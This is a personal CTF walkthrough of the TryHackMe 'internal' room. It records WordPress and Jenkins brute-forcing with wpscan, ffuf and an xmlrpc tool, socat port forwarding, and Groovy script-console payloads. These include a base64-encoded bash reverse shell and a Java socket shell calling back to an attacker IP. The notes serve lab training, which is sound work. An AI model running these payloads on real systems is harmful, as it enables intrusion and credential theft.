Notes
  • 👀About me
  • ℹī¸Good Reads
  • 🌐Web
    • Web Pentesting Checklist
    • Insecure Deserialization
    • Blind XPath Injection
    • GraphQL
    • Reverse Shells
      • IIS
    • Content-Security-Policy
      • XSS (Static Nonce in CSP)
    • LLM (Large Language Models)
  • 📘Windows API
    • C# - P/Invoke
  • ☕Miscellaneous Topics
    • Phishing with Gophish
    • Pentest Diaries
      • SQL Queries via Grafana
      • LDAP Pass Back Attack
      • Misconfigured File Upload to RCE
  • 🧃Hack The Box
    • Intelligence
    • Seal
    • Under Construction
    • Previse
    • Return
    • Sauna
    • Nest
  • 📕TryHackMe
    • Wordpress CVE-2021-29447
    • Attacktiv
    • Fortress
    • internal
  • 🛠ī¸Cheatsheet
    • Anti-Forensic Techniques
    • JSON - jq
    • Docker
    • Hidden Secrets
    • Database Exploitation
      • PostgreSQL
        • Blind SQLi script
      • SQL Server
    • C Sharp
    • Reversing
      • Windows
    • SSH
    • Python
      • Miscellaneous Scripts
        • Credential Bruteforcing a CLI service
    • Privilege Escalation
      • Windows
    • socat
    • OSINT
      • Shodan
    • Installation
Powered by GitBook
On this page

Was this helpful?

  1. TryHackMe

internal

https://tryhackme.com/room/internal

PreviousFortressNextAnti-Forensic Techniques

Last updated 3 years ago

Was this helpful?

http://internal.thm/phpmyadmin/ http://internal.thm/blog/wp-login.php

- Wordpress 5.4.2 Users - http://internal.thm/blog/index.php/wp-json/wp/v2/users/ wpscan --url http://internal.thm/blog/ -o wps.txt -e vp,vt,u1-50 wpscan --url -U admin -P ../rockyou.txt -t 50 --password-attack wp-login

admin:my2boys

python3 xmlrpc-bruteforcer.py -u admin -w ../rockyou.txt -x http://internal.thm/blog/xmlrpc.php

- phpmyadmin v4.6.6 defaults creds - root:<blank>

william:[redacted]

aubreanna:[redacted]

â€ĸ inside a docker container? cat /proc/self/cgroup

jenkins 2.250

./socat TCP-LISTEN:9700,fork TCP:172.17.0.2:8080

ffuf -X POST -request rr -u -w ../userlist.txt:UN -w ../passwordlist.txt:PW -fr loginError -s

ffuf -X POST -u -d "j_username=admin&j_password=FUZZ&from=%2F&Submit=Sign+in" -w pwdl -fr loginError -H 'Content-Type: application/x-www-form-urlencoded''

â€ĸ Groovy script RCE in Jenkins - <url>/script #1 def sout = new StringBuffer(), serr = new StringBuffer() def proc = '<cmd>'.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr"

#2 def sout = new StringBuffer(), serr = new StringBuffer() def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xNC4xNy4xNjkvNzkwMiAwPiYxJwo=}|{base64,-d}|{bash,-i}'.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr"

#3 cmd.exe for windows String host="10.17.14.169"; int port=7902; String cmd="/bin/bash"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

root:[redacted]

j_username=test&j_password=test&from=%2F&Submit=Sign+in

========================================= PoC: - xmlrpc system.mutlicall doesn't work - login as admin into wp - wp-login.php bruteforce - upload malicious plugin for RCE - the plugin directory isn't writable - theme directory is writable, uploaded shell - mapped jenkins docker ip:port to machine ip:port using socat - jenkins running in a docker container - lets try bf'ing jenkins login - injected reverse shell script in groovy

📕
http://internal.thm/blog/
http://10.10.47.108:9700/j_acegi_security_check
http://10.10.47.108:9700/j_acegi_security_check
http://10.10.47.108:9700/j_acegi_security_check